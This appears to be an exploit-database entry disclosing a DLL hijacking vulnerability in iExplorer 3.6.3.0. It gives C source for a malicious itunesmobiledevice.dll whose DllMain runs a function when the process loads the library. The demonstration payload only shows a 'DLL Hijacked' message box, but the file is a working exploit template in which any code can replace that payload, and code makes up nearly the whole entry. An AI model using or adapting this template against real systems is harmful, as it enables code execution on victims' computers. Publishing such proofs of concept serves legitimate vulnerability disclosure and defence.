iExplorer version 3.6.3.0 suffers from a DLL hijacking vulnerability.
7d94137800b3ed544d3ffc8ad471b871367529331fe7dba2da2a01062f297e8a
/*
* Exploit Title: iExplorer 3.6.3.0 DLL Hijacking Exploit (itunesmobiledevice.dll)
* Date: 25/12/2014
* Author: Hadji Samir s-dz@hotmail.fr
* Vendor Homepage: http://www.macroplant.com/
*Soft link :http://www.macroplant.com/downloads
* Tested on: windows 7 fr
*/
#include <windows.h>
BOOL WINAPI DllMain (
HANDLE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved)
{
switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
owned();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
int owned() {
MessageBox(0, "iExplorer DLL Hijacked\Hadji Samir", "POC", MB_OK);
}